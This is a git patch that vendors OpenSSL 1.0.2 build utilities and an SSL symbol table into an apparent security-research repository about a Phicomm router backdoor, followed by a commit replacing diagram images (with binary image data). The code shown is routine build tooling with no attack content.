+SSL_CTX_set_default_verify_paths        142	EXIST:!VMS:FUNCTION:
+SSL_CTX_set_def_verify_paths            142	EXIST:VMS:FUNCTION:
+SSL_CTX_set_ex_data                     143	EXIST::FUNCTION:
+SSL_CTX_set_quiet_shutdown              145	EXIST::FUNCTION:
+SSL_SESSION_get_ex_data                 146	EXIST::FUNCTION:
+SSL_SESSION_set_ex_data                 148	EXIST::FUNCTION:
+SSL_get_SSL_CTX                         150	EXIST::FUNCTION:
+SSL_get_ex_data                         151	EXIST::FUNCTION:
+SSL_get_quiet_shutdown                  153	EXIST::FUNCTION:
+SSL_get_session                         154	EXIST::FUNCTION:
+SSL_get_shutdown                        155	EXIST::FUNCTION:
+SSL_get_verify_result                   157	EXIST::FUNCTION:
+SSL_set_ex_data                         158	EXIST::FUNCTION:
+SSL_set_info_callback                   160	EXIST::FUNCTION:
+SSL_set_quiet_shutdown                  161	EXIST::FUNCTION:
+SSL_set_shutdown                        162	EXIST::FUNCTION:
+SSL_set_verify_result                   163	EXIST::FUNCTION:
+SSL_version                             164	EXIST::FUNCTION:
+SSL_get_info_callback                   165	EXIST::FUNCTION:
+SSL_state                               166	EXIST::FUNCTION:
+SSL_CTX_get_ex_new_index                167	EXIST::FUNCTION:
+SSL_SESSION_get_ex_new_index            168	EXIST::FUNCTION:
+SSL_get_ex_new_index                    169	EXIST::FUNCTION:
+TLSv1_method                            170	EXIST::FUNCTION:
+TLSv1_server_method                     171	EXIST::FUNCTION:
+TLSv1_client_method                     172	EXIST::FUNCTION:
+BIO_new_buffer_ssl_connect              173	EXIST::FUNCTION:BIO
+BIO_new_ssl_connect                     174	EXIST::FUNCTION:BIO
+SSL_get_ex_data_X509_STORE_CTX_idx      175	EXIST:!VMS:FUNCTION:
+SSL_get_ex_d_X509_STORE_CTX_idx         175	EXIST:VMS:FUNCTION:
+SSL_CTX_set_tmp_dh_callback             176	EXIST::FUNCTION:DH
+SSL_CTX_set_tmp_rsa_callback            177	EXIST::FUNCTION:RSA
+SSL_CTX_set_timeout                     178	EXIST::FUNCTION:
+SSL_CTX_get_timeout                     179	EXIST::FUNCTION:
+SSL_CTX_get_cert_store                  180	EXIST::FUNCTION:
+SSL_CTX_set_cert_store                  181	EXIST::FUNCTION:
+SSL_want                                182	EXIST::FUNCTION:
+SSL_library_init                        183	EXIST::FUNCTION:
+SSL_COMP_add_compression_method         184	EXIST::FUNCTION:COMP
+SSL_add_file_cert_subjects_to_stack     185	EXIST:!VMS:FUNCTION:STDIO
+SSL_add_file_cert_subjs_to_stk          185	EXIST:VMS:FUNCTION:STDIO
+SSL_set_tmp_rsa_callback                186	EXIST::FUNCTION:RSA
+SSL_set_tmp_dh_callback                 187	EXIST::FUNCTION:DH
+SSL_add_dir_cert_subjects_to_stack      188	EXIST:!VMS:FUNCTION:STDIO
+SSL_add_dir_cert_subjs_to_stk           188	EXIST:VMS:FUNCTION:STDIO
+SSL_set_session_id_context              189	EXIST::FUNCTION:
+SSL_CTX_use_certificate_chain_file      222	EXIST:!VMS:FUNCTION:STDIO
+SSL_CTX_use_cert_chain_file             222	EXIST:VMS:FUNCTION:STDIO
+SSL_CTX_set_verify_depth                225	EXIST::FUNCTION:
+SSL_set_verify_depth                    226	EXIST::FUNCTION:
+SSL_CTX_get_verify_depth                228	EXIST::FUNCTION:
+SSL_get_verify_depth                    229	EXIST::FUNCTION:
+SSL_CTX_set_session_id_context          231	EXIST::FUNCTION:
+SSL_CTX_set_cert_verify_callback        232	EXIST:!VMS:FUNCTION:
+SSL_CTX_set_cert_verify_cb              232	EXIST:VMS:FUNCTION:
+SSL_test_functions                      233	EXIST::FUNCTION:UNIT_TEST
+SSL_CTX_set_default_passwd_cb_userdata  235	EXIST:!VMS:FUNCTION:
+SSL_CTX_set_def_passwd_cb_ud            235	EXIST:VMS:FUNCTION:
+SSL_set_purpose                         236	EXIST::FUNCTION:
+SSL_CTX_set_trust                       237	EXIST::FUNCTION:
+SSL_CTX_set_purpose                     238	EXIST::FUNCTION:
+SSL_set_trust                           239	EXIST::FUNCTION:
+SSL_get_finished                        240	EXIST::FUNCTION:
+SSL_get_peer_finished                   241	EXIST::FUNCTION:
+SSL_get1_session                        242	EXIST::FUNCTION:
+SSL_CTX_callback_ctrl                   243	EXIST::FUNCTION:
+SSL_callback_ctrl                       244	EXIST::FUNCTION:
+SSL_CTX_sessions                        245	EXIST::FUNCTION:
+SSL_get_rfd                             246	EXIST::FUNCTION:
+SSL_get_wfd                             247	EXIST::FUNCTION:
+kssl_cget_tkt                           248	EXIST::FUNCTION:KRB5
+SSL_has_matching_session_id             249	EXIST::FUNCTION:
+kssl_err_set                            250	EXIST::FUNCTION:KRB5
+kssl_ctx_show                           251	EXIST::FUNCTION:KRB5
+kssl_validate_times                     252	EXIST::FUNCTION:KRB5
+kssl_check_authent                      253	EXIST::FUNCTION:KRB5
+kssl_ctx_new                            254	EXIST::FUNCTION:KRB5
+kssl_build_principal_2                  255	EXIST::FUNCTION:KRB5
+kssl_skip_confound                      256	EXIST::FUNCTION:KRB5
+kssl_sget_tkt                           257	EXIST::FUNCTION:KRB5
+SSL_set_generate_session_id             258	EXIST::FUNCTION:
+kssl_ctx_setkey                         259	EXIST::FUNCTION:KRB5
+kssl_ctx_setprinc                       260	EXIST::FUNCTION:KRB5
+kssl_ctx_free                           261	EXIST::FUNCTION:KRB5
+kssl_krb5_free_data_contents            262	EXIST::FUNCTION:KRB5
+kssl_ctx_setstring                      263	EXIST::FUNCTION:KRB5
+SSL_CTX_set_generate_session_id         264	EXIST::FUNCTION:
+SSL_renegotiate_pending                 265	EXIST::FUNCTION:
+SSL_CTX_set_msg_callback                266	EXIST::FUNCTION:
+SSL_set_msg_callback                    267	EXIST::FUNCTION:
+DTLSv1_client_method                    268	EXIST::FUNCTION:
+SSL_CTX_set_tmp_ecdh_callback           269	EXIST::FUNCTION:ECDH
+SSL_set_tmp_ecdh_callback               270	EXIST::FUNCTION:ECDH
+SSL_COMP_get_name                       271	EXIST::FUNCTION:COMP
+SSL_get_current_compression             272	EXIST::FUNCTION:COMP
+DTLSv1_method                           273	EXIST::FUNCTION:
+SSL_get_current_expansion               274	EXIST::FUNCTION:COMP
+DTLSv1_server_method                    275	EXIST::FUNCTION:
+SSL_COMP_get_compression_methods        276	EXIST:!VMS:FUNCTION:COMP
+SSL_COMP_get_compress_methods           276	EXIST:VMS:FUNCTION:COMP
+SSL_SESSION_get_id                      277	EXIST::FUNCTION:
+SSL_CTX_sess_set_new_cb                 278	EXIST::FUNCTION:
+SSL_CTX_sess_get_get_cb                 279	EXIST::FUNCTION:
+SSL_CTX_sess_set_get_cb                 280	EXIST::FUNCTION:
+SSL_CTX_set_cookie_verify_cb            281	EXIST::FUNCTION:
+SSL_CTX_get_info_callback               282	EXIST::FUNCTION:
+SSL_CTX_set_cookie_generate_cb          283	EXIST::FUNCTION:
+SSL_CTX_set_client_cert_cb              284	EXIST::FUNCTION:
+SSL_CTX_sess_set_remove_cb              285	EXIST::FUNCTION:
+SSL_CTX_set_info_callback               286	EXIST::FUNCTION:
+SSL_CTX_sess_get_new_cb                 287	EXIST::FUNCTION:
+SSL_CTX_get_client_cert_cb              288	EXIST::FUNCTION:
+SSL_CTX_sess_get_remove_cb              289	EXIST::FUNCTION:
+SSL_set_SSL_CTX                         290	EXIST::FUNCTION:
+SSL_get_servername                      291	EXIST::FUNCTION:TLSEXT
+SSL_get_servername_type                 292	EXIST::FUNCTION:TLSEXT
+SSL_CTX_set_client_cert_engine          293	EXIST::FUNCTION:ENGINE
+SSL_CTX_use_psk_identity_hint           294	EXIST::FUNCTION:PSK
+SSL_CTX_set_psk_client_callback         295	EXIST::FUNCTION:PSK
+PEM_write_bio_SSL_SESSION               296	EXIST::FUNCTION:
+SSL_get_psk_identity_hint               297	EXIST::FUNCTION:PSK
+SSL_set_psk_server_callback             298	EXIST::FUNCTION:PSK
+SSL_use_psk_identity_hint               299	EXIST::FUNCTION:PSK
+SSL_set_psk_client_callback             300	EXIST::FUNCTION:PSK
+PEM_read_SSL_SESSION                    301	EXIST:!WIN16:FUNCTION:
+PEM_read_bio_SSL_SESSION                302	EXIST::FUNCTION:
+SSL_CTX_set_psk_server_callback         303	EXIST::FUNCTION:PSK
+SSL_get_psk_identity                    304	EXIST::FUNCTION:PSK
+PEM_write_SSL_SESSION                   305	EXIST:!WIN16:FUNCTION:
+SSL_set_session_ticket_ext              306	EXIST::FUNCTION:
+SSL_set_session_secret_cb               307	EXIST::FUNCTION:
+SSL_set_session_ticket_ext_cb           308	EXIST::FUNCTION:
+SSL_set1_param                          309	EXIST::FUNCTION:
+SSL_CTX_set1_param                      310	EXIST::FUNCTION:
+SSL_tls1_key_exporter                   311	NOEXIST::FUNCTION:
+SSL_renegotiate_abbreviated             312	EXIST::FUNCTION:
+TLSv1_1_method                          313	EXIST::FUNCTION:
+TLSv1_1_client_method                   314	EXIST::FUNCTION:
+TLSv1_1_server_method                   315	EXIST::FUNCTION:
+SSL_CTX_set_srp_client_pwd_callback     316	EXIST:!VMS:FUNCTION:SRP
+SSL_CTX_set_srp_client_pwd_cb           316	EXIST:VMS:FUNCTION:SRP
+SSL_get_srp_g                           317	EXIST::FUNCTION:SRP
+SSL_CTX_set_srp_username_callback       318	EXIST:!VMS:FUNCTION:SRP
+SSL_CTX_set_srp_un_cb                   318	EXIST:VMS:FUNCTION:SRP
+SSL_get_srp_userinfo                    319	EXIST::FUNCTION:SRP
+SSL_set_srp_server_param                320	EXIST::FUNCTION:SRP
+SSL_set_srp_server_param_pw             321	EXIST::FUNCTION:SRP
+SSL_get_srp_N                           322	EXIST::FUNCTION:SRP
+SSL_get_srp_username                    323	EXIST::FUNCTION:SRP
+SSL_CTX_set_srp_password                324	EXIST::FUNCTION:SRP
+SSL_CTX_set_srp_strength                325	EXIST::FUNCTION:SRP
+SSL_CTX_set_srp_verify_param_callback   326	EXIST:!VMS:FUNCTION:SRP
+SSL_CTX_set_srp_vfy_param_cb            326	EXIST:VMS:FUNCTION:SRP
+SSL_CTX_set_srp_miss_srp_un_cb          327	NOEXIST::FUNCTION:
+SSL_CTX_set_srp_missing_srp_username_callback 327	NOEXIST::FUNCTION:
+SSL_CTX_set_srp_cb_arg                  328	EXIST::FUNCTION:SRP
+SSL_CTX_set_srp_username                329	EXIST::FUNCTION:SRP
+SSL_CTX_SRP_CTX_init                    330	EXIST::FUNCTION:SRP
+SSL_SRP_CTX_init                        331	EXIST::FUNCTION:SRP
+SRP_Calc_A_param                        332	EXIST::FUNCTION:SRP
+SRP_generate_server_master_secret       333	EXIST:!VMS:FUNCTION:SRP
+SRP_gen_server_master_secret            333	EXIST:VMS:FUNCTION:SRP
+SSL_CTX_SRP_CTX_free                    334	EXIST::FUNCTION:SRP
+SRP_generate_client_master_secret       335	EXIST:!VMS:FUNCTION:SRP
+SRP_gen_client_master_secret            335	EXIST:VMS:FUNCTION:SRP
+SSL_srp_server_param_with_username      336	EXIST:!VMS:FUNCTION:SRP
+SSL_srp_server_param_with_un            336	EXIST:VMS:FUNCTION:SRP
+SRP_have_to_put_srp_username            337	NOEXIST::FUNCTION:
+SSL_SRP_CTX_free                        338	EXIST::FUNCTION:SRP
+SSL_set_debug                           339	EXIST::FUNCTION:
+SSL_SESSION_get0_peer                   340	EXIST::FUNCTION:
+TLSv1_2_client_method                   341	EXIST::FUNCTION:
+SSL_SESSION_set1_id_context             342	EXIST::FUNCTION:
+TLSv1_2_server_method                   343	EXIST::FUNCTION:
+SSL_cache_hit                           344	EXIST::FUNCTION:
+SSL_get0_kssl_ctx                       345	EXIST::FUNCTION:KRB5
+SSL_set0_kssl_ctx                       346	EXIST::FUNCTION:KRB5
+SSL_SESSION_get0_id                     347	NOEXIST::FUNCTION:
+SSL_set_state                           348	EXIST::FUNCTION:
+SSL_CIPHER_get_id                       349	EXIST::FUNCTION:
+TLSv1_2_method                          350	EXIST::FUNCTION:
+SSL_SESSION_get_id_len                  351	NOEXIST::FUNCTION:
+kssl_ctx_get0_client_princ              352	EXIST::FUNCTION:KRB5
+SSL_export_keying_material              353	EXIST::FUNCTION:TLSEXT
+SSL_set_tlsext_use_srtp                 354	EXIST::FUNCTION:SRTP
+SSL_CTX_set_next_protos_advertised_cb   355	EXIST:!VMS:FUNCTION:NEXTPROTONEG
+SSL_CTX_set_next_protos_adv_cb          355	EXIST:VMS:FUNCTION:NEXTPROTONEG
+SSL_get0_next_proto_negotiated          356	EXIST::FUNCTION:NEXTPROTONEG
+SSL_get_selected_srtp_profile           357	EXIST::FUNCTION:SRTP
+SSL_CTX_set_tlsext_use_srtp             358	EXIST::FUNCTION:SRTP
+SSL_select_next_proto                   359	EXIST::FUNCTION:TLSEXT
+SSL_get_srtp_profiles                   360	EXIST::FUNCTION:SRTP
+SSL_CTX_set_next_proto_select_cb        361	EXIST:!VMS:FUNCTION:NEXTPROTONEG
+SSL_CTX_set_next_proto_sel_cb           361	EXIST:VMS:FUNCTION:NEXTPROTONEG
+SSL_SESSION_get_compress_id             362	EXIST::FUNCTION:
+SSL_get0_param                          363	EXIST::FUNCTION:
+SSL_CTX_get0_privatekey                 364	EXIST::FUNCTION:
+SSL_get_shared_sigalgs                  365	EXIST::FUNCTION:TLSEXT
+SSL_CONF_CTX_finish                     366	EXIST::FUNCTION:
+DTLS_method                             367	EXIST::FUNCTION:
+DTLS_client_method                      368	EXIST::FUNCTION:
+SSL_CIPHER_standard_name                369	EXIST::FUNCTION:SSL_TRACE
+SSL_set_alpn_protos                     370	EXIST::FUNCTION:
+SSL_CTX_set_srv_supp_data               371	NOEXIST::FUNCTION:
+SSL_CONF_cmd_argv                       372	EXIST::FUNCTION:
+DTLSv1_2_server_method                  373	EXIST::FUNCTION:
+SSL_COMP_set0_compression_methods       374	EXIST:!VMS:FUNCTION:COMP
+SSL_COMP_set0_compress_methods          374	EXIST:VMS:FUNCTION:COMP
+SSL_CTX_set_cert_cb                     375	EXIST::FUNCTION:
+SSL_CTX_add_client_custom_ext           376	EXIST::FUNCTION:TLSEXT
+SSL_is_server                           377	EXIST::FUNCTION:
+SSL_CTX_get0_param                      378	EXIST::FUNCTION:
+SSL_CONF_cmd                            379	EXIST::FUNCTION:
+SSL_CTX_get_ssl_method                  380	EXIST::FUNCTION:
+SSL_CONF_CTX_set_ssl_ctx                381	EXIST::FUNCTION:
+SSL_CIPHER_find                         382	EXIST::FUNCTION:
+SSL_CTX_use_serverinfo                  383	EXIST::FUNCTION:TLSEXT
+DTLSv1_2_client_method                  384	EXIST::FUNCTION:
+SSL_get0_alpn_selected                  385	EXIST::FUNCTION:
+SSL_CONF_CTX_clear_flags                386	EXIST::FUNCTION:
+SSL_CTX_set_alpn_protos                 387	EXIST::FUNCTION:
+SSL_CTX_add_server_custom_ext           389	EXIST::FUNCTION:TLSEXT
+SSL_CTX_get0_certificate                390	EXIST::FUNCTION:
+SSL_CTX_set_alpn_select_cb              391	EXIST::FUNCTION:
+SSL_CONF_cmd_value_type                 392	EXIST::FUNCTION:
+SSL_set_cert_cb                         393	EXIST::FUNCTION:
+SSL_get_sigalgs                         394	EXIST::FUNCTION:TLSEXT
+SSL_CONF_CTX_set1_prefix                395	EXIST::FUNCTION:
+SSL_CONF_CTX_new                        396	EXIST::FUNCTION:
+SSL_CONF_CTX_set_flags                  397	EXIST::FUNCTION:
+SSL_CONF_CTX_set_ssl                    398	EXIST::FUNCTION:
+SSL_check_chain                         399	EXIST::FUNCTION:TLSEXT
+SSL_certs_clear                         400	EXIST::FUNCTION:
+SSL_CONF_CTX_free                       401	EXIST::FUNCTION:
+SSL_trace                               402	EXIST::FUNCTION:SSL_TRACE
+SSL_CTX_set_cli_supp_data               403	NOEXIST::FUNCTION:
+DTLSv1_2_method                         404	EXIST::FUNCTION:
+DTLS_server_method                      405	EXIST::FUNCTION:
+SSL_CTX_use_serverinfo_file             406	EXIST::FUNCTION:STDIO,TLSEXT
+SSL_COMP_free_compression_methods       407	EXIST:!VMS:FUNCTION:COMP
+SSL_COMP_free_compress_methods          407	EXIST:VMS:FUNCTION:COMP
+SSL_extension_supported                 409	EXIST::FUNCTION:TLSEXT
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/su-filter.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/su-filter.pl
new file mode 100644
index 0000000..8975af6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/su-filter.pl
@@ -0,0 +1,260 @@
+#!/usr/bin/env perl
+#
+# su-filter.pl
+#
+use strict;
+
+my $in_su = 0;
+my $indent = 0;
+my $out;
+my $braces = 0;
+my $arrcnt;
+my $data;
+my $tststr;
+my $incomm = 0;
+
+while(<>) {
+    $tststr = $_;
+    $incomm++ while $tststr =~ /\/\*/g;
+    $incomm-- while $tststr =~ /\*\//g;
+
+    if($in_su == 1) {
+        if(/}(.*);/) {
+            $out .= $_;
+            do_output($out);
+            $in_su = 0;
+        } elsif(/^ *\} [^\s]+(\[\d*\])* = \{/) {
+           $tststr = $1;
+           $arrcnt = 0;
+           $arrcnt++ while $tststr =~ /\[/g;
+           $in_su++;
+           $braces = 1;
+           /^(.* = \{)(.*)$/;
+           $data = $2;
+           $out .= $1."\n";
+        } else {
+            $out .= $_;
+        }
+    } elsif($in_su == 2) {
+        $data .= $_;
+        if(/};$/) {
+            #$data = "\n$data";
+            $data =~ s/\n */\n/g;
+            $data =~ s/};\n?//s;
+            my @strucdata = structureData($data);
+            $out .= displayData($indent, 0, \@strucdata);
+            $out .= "\n$indent};\n";
+            do_output($out);
+            $in_su = 0;
+        }
+    } elsif($incomm <= 0 && /( *)(static )?(const )?(union|struct) ([^\s]+ )?\{/) {
+        $in_su = 1;
+        $indent = $1;
+        $out = $_;
+        next;
+    } else {
+        do_output($_);
+    }
+}
+
+
+sub structureData {
+    my $data = $_[0];
+    my @datalist = split(/(\{|\}|,|"|#|\n|\/\*|\*\/|\(|\))/, $data);
+    my $item;
+    my $dataitem = "";
+    my @struclist = ();
+    my $substruc;
+    my $inquote = 0;
+    my $inbrace = 0;
+    my $preproc = 0;
+    my $comment = 0;
+    my $inparen = 0;
+
+
+    foreach $item (@datalist) {
+        if($comment) {
+            if($item eq "*/") {
+                $comment = 0;
+                $dataitem .= "*/";
+                push @struclist, $dataitem;
+                $dataitem = "";
+                next;
+            }
+            $dataitem .= $item;
+            next;
+        }
+        if($inquote) {
+            $dataitem .= $item;
+            if($item eq "\"") {
+                $inquote--;
+            }
+            next;
+        }
+        if($preproc) {
+            if($item eq "\n") {
+                $preproc = 0;
+                push @struclist, $dataitem;
+                $dataitem = "";
+                next;
+            }
+            $dataitem .= $item;
+            next;
+        }
+        if($inbrace) {
+            if($item eq "}") {
+                $inbrace --;
+            
+                if(!$inbrace) {
+                    $substruc = structureData($dataitem);
+                    $dataitem = $substruc;
+                    next;
+                }
+            } elsif($item eq "{") {
+                $inbrace++;
+            } elsif ($item eq "\"") {
+                $inquote++;
+            }
+            $dataitem .= $item;
+            next;
+        }
+        if($inparen) {
+            if($item eq ")") {
+                $inparen--;
+            }
+            $dataitem .= $item;
+            next;
+        }
+        if($item eq "\n") {
+            next;
+        }
+        if($item eq "#") {
+            $preproc = 1;
+            push @struclist, $dataitem;
+            $dataitem = "#";
+            next;
+        }
+        if($item eq "/*") {
+            $comment = 1;
+            push @struclist, $dataitem;
+            $dataitem= "/*";
+            next;
+        }
+        if($item eq "\"") {
+            $dataitem .= $item;
+            $inquote++;
+            next;
+        }
+        if($item eq "{") {
+            $inbrace++;
+            next;
+        }
+        if($item eq ",") {
+            push @struclist, $dataitem;
+            $dataitem = "";
+            next;
+        }
+        if($item eq "(") {
+            $dataitem .= $item;
+            $inparen++;
+            next;
+        }
+        if($item =~ /^\s*$/) {
+            next;
+        }
+        if(ref $dataitem eq 'ARRAY') {
+            push @struclist, $dataitem;
+            $dataitem = "";
+        }
+        $dataitem .= $item;
+    }
+    push @struclist, $dataitem;
+    return \@struclist;
+}
+
+sub displayData {
+    my $indent = shift;
+    my $depth = shift;
+    my $data = shift;
+    my $item;
+    my $out = "";
+    my $currline = "";
+    my $first = 1;
+    my $prevpreproc = 0;
+    my $prevcomment = 0;
+
+    foreach $item (@{$data}) {
+        if($item =~ /^\/\*/) {
+            #Comment
+            $item =~ s/\n/\n$indent/g;
+            if($out =~ /\n\s*$/s) {
+                $out .= $item."\n".$indent;
+            } else {
+                $out .= "\n".$indent.$item."\n".$indent;
+            }
+            $currline = $indent;
+            $prevcomment = 1;
+            next;
+        }
+        $item =~ s/^\s+//;
+        if($item =~ /^#/) {
+            #Pre-processor directive
+            if($out =~ /\n\s*$/s) {
+                $out =~ s/\n\s*$/\n/;
+                $out .= $item."\n".$indent;
+            } else {
+                $out .= "\n".$item."\n".$indent;
+            }
+            $currline = $indent;
+            $prevpreproc = 1;
+            next;
+        }
+        if($first) {
+            $first = 0;
+            if($depth != 0) {
+                $out .= $indent;
+                $currline = $indent;
+            }
+        } else {
+            if(!$prevpreproc && !$prevcomment) {
+                $out .= ", ";
+                $currline .= ", ";
+                if($depth == 1) {
+                    $out .= "\n";
+                    $currline = "";
+                }
+                if($depth == 1) {
+                    $out .= $indent;
+                    $currline .= $indent;
+                }
+            }
+
+        }
+        $prevpreproc = 0;
+        $prevcomment = 0;
+
+        if (ref $item eq 'ARRAY') {
+            if($depth == 0) {
+                $out .= displayData("$indent    ", $depth+1, $item);
+            } else {
+                $out .= "{\n".displayData("$indent    ", $depth+1, $item)."\n".$indent."}";
+                $currline = $indent."}";
+            }
+        } else {
+            if(length $currline.$item > 79) {
+                $currline = $indent;
+                $out .= "\n$indent";
+            }
+            $out .= $item;
+            $currline .= $item;
+        }
+    }
+    return $out;
+}
+
+sub do_output {
+    my $out = shift;
+    # Strip any trailing whitespace
+    $out =~ s/\s+\n/\n/g;
+    print $out;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/tab_num.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/tab_num.pl
new file mode 100755
index 0000000..a81ed0e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/tab_num.pl
@@ -0,0 +1,17 @@
+#!/usr/local/bin/perl
+
+$num=1;
+$width=40;
+
+while (<>)
+	{
+	chop;
+
+	$i=length($_);
+
+	$n=$width-$i;
+	$i=int(($n+7)/8);
+	print $_.("\t" x $i).$num."\n";
+	$num++;
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/x86asm.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/x86asm.sh
new file mode 100755
index 0000000..d2090a9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/x86asm.sh
@@ -0,0 +1,42 @@
+#!/bin/sh
+
+echo Generating x86 assember
+echo Bignum
+(cd crypto/bn/asm; perl x86.pl cpp > bn86unix.cpp)
+(cd crypto/bn/asm; perl x86.pl win32 > bn-win32.asm)
+
+echo DES
+(cd crypto/des/asm; perl des-586.pl cpp > dx86unix.cpp)
+(cd crypto/des/asm; perl des-586.pl win32 > d-win32.asm)
+
+echo "crypt(3)"
+(cd crypto/des/asm; perl crypt586.pl cpp > yx86unix.cpp)
+(cd crypto/des/asm; perl crypt586.pl win32 > y-win32.asm)
+
+echo Blowfish
+(cd crypto/bf/asm; perl bf-586.pl cpp > bx86unix.cpp)
+(cd crypto/bf/asm; perl bf-586.pl win32 > b-win32.asm)
+
+echo CAST5
+(cd crypto/cast/asm; perl cast-586.pl cpp > cx86unix.cpp)
+(cd crypto/cast/asm; perl cast-586.pl win32 > c-win32.asm)
+
+echo RC4
+(cd crypto/rc4/asm; perl rc4-586.pl cpp > rx86unix.cpp)
+(cd crypto/rc4/asm; perl rc4-586.pl win32 > r4-win32.asm)
+
+echo MD5
+(cd crypto/md5/asm; perl md5-586.pl cpp > mx86unix.cpp)
+(cd crypto/md5/asm; perl md5-586.pl win32 > m5-win32.asm)
+
+echo SHA1
+(cd crypto/sha/asm; perl sha1-586.pl cpp > sx86unix.cpp)
+(cd crypto/sha/asm; perl sha1-586.pl win32 > s1-win32.asm)
+
+echo RIPEMD160
+(cd crypto/ripemd/asm; perl rmd-586.pl cpp > rm86unix.cpp)
+(cd crypto/ripemd/asm; perl rmd-586.pl win32 > rm-win32.asm)
+
+echo RC5/32
+(cd crypto/rc5/asm; perl rc5-586.pl cpp > r586unix.cpp)
+(cd crypto/rc5/asm; perl rc5-586.pl win32 > r5-win32.asm)

From 29ee06b0274c1e6c3b92efd28cd7c2702c85ab2b Mon Sep 17 00:00:00 2001
From: Lucca Fraser <lucca.fraser@gmail.com>
Date: Fri, 8 Apr 2022 08:31:34 -0300
Subject: [PATCH 2/2] fixed typo in diagram

---
 ...ms_Encrypted_Backdoor_on_UDP_Port_21210.png | Bin 278849 -> 0 bytes
 ...ms_Encrypted_Backdoor_on_UDP_Port_21210.svg |   1 -
 ...ms_Encrypted_Backdoor_on_UDP_Port_21210.png | Bin 535389 -> 0 bytes
 ...ms_Encrypted_Backdoor_on_UDP_Port_21210.svg |   1 -
 .../img/backdoor_lockpick.svg                  |   1 +
 .../img/backdoor_protocol.svg                  |   1 +
 6 files changed, 2 insertions(+), 2 deletions(-)
 delete mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png
 delete mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
 delete mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png
 delete mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/img/backdoor_lockpick.svg
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/img/backdoor_protocol.svg

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png b/Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.png
deleted file mode 100644
index 5197a4d1417a59c1c7133a743ca1fd6e99184243..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 278849
zcmdqJc{r8r+cvzKi!_=GB?`+BlFX%06d9LUkxZHAxfBXfGE~M4nU{GUBNQRy!oni6
zWoDU&@3?f|&-1+R_I}&@J>U1wyM6uf`?*=eb)DyN9>;#{`+i(+9?Hv5kkON&P$-If
zckd{nPzNz6)RFq5hv7GLzr8M@P!~}5?%Yywik$9ubfWD1Q@8M8fczEXDgB!_Z-y`*
zZHpk=e@2n}^(x1O3tqbCI85)H=48WU`!jo0b*6QnI{lvGg3jQX#5YP*q1>!2b8|u4
zP4CQqUM_w0Y<6`?bV>B*uW2D=2gj!aVzzZh;XC1<)YInG{eOQv$X`wM_a}){*uOul
zy|6m8_fyr$SLnaL^0=VAZ||r114CrbpLZ8p#su(M+<x{feX27p$#t$Av$-;3>l(!?
z{rK@?Z!8Zht5h8=gP6;;Q~r9U<?CY+e09dvua1qU2lnQhx%RDMYm8#t9h$@T9Wv|5
zNetlCtZ*xC$)po?%Bpv#V_?Y8%r`ap@$O=8h5M$E_LLVDN#uKk^U~N)+IViAl7s2L
zc2%8&$fGNEm&nM;Kk!NuyE1I)=Qg&_oH-M>w&s-h^=qp8<_f)#O#<Fb+j%3<&(BYZ
zG}YNz>FJrFQ(EwlI67&2nwt7685PIGR9a@243oP`@?vv%U!OLYX5L*#f_vfT>*lH7
zzu%F%bB9epK(*X;wd+r<e|d$&(pb~ytB<`lNW>(#6*LRWojTeFkvFoxcZB1#EXxz0
zHhpHlc=6V;W5-Mf%8D;5L{GPy?W@ATLhfgtyJrVi+WF=75&MbXx9q1nvK2lzhVx`L
zMF@(N2U?BxaWq>cs%2=JcBOy9J)Ue!9DhdVbx&J6GJsdu`p=#0E}}w_QogC`CVxMC
zhJf+!n~I8xe06Nx-12C(^c%i%(Gu06!RU8GvM&!)Ot0$sQ*)`Lsd0Jx`1FoC&h)Cf
zuFjIw3zGQg1xypVyVdCoC>a^Cbo@`(%5<Z}Y2eNu_T(7Oj1~_EinwvNFzJ*!gz`$;
zj{Ra^HmlrPluNQoMlSAm><fK;{pky4zdrIZ>WMt-z8dt+%;T|)HSUVg{-_Ac3XM8i
zShi$%yD1JE#mvn7B%n2;aA0cl@PX(1A;^xtF1ylt<ivTa&jpWb4(m7#dGpmJ8#ac?
zxBIy~UhXx^G=WeNcHhX;Yt-qbGAdg9c7!Q1S6KGLqvIGKigRPv&F2Qn9X`FK7a$vn
zqb3`Y{Ymx1s<wT#aj3?Z1lyVFw!R3fA||F&xxEsBcN=K9VKw+1Td`qEXAtu7W3t4~
zT1^sZai#bMd<Ub;#6{Pr@urAzW#^swE83s<jRHSkGl^qY{yH%~RI{=+TpvV?+1*Mi
zXC!!RX5h{AJh$!pJ$JW13)y}xu;@>1juN4vb)a-~4_<B-nfpN-??;8^K%*NOE1j2~
zswO|YRYzOCI^en<whvXotiA8lsdaC3@bY9*OmDm6+<<w|$z|`;k*BdCqKT~9?-O7d
zdSZyTeNP-RRV4SeN*oc!4fz@3usW&Q#W?}IQ@G3+{PNb`4fT^X;{2z*#AzOUzV@D1
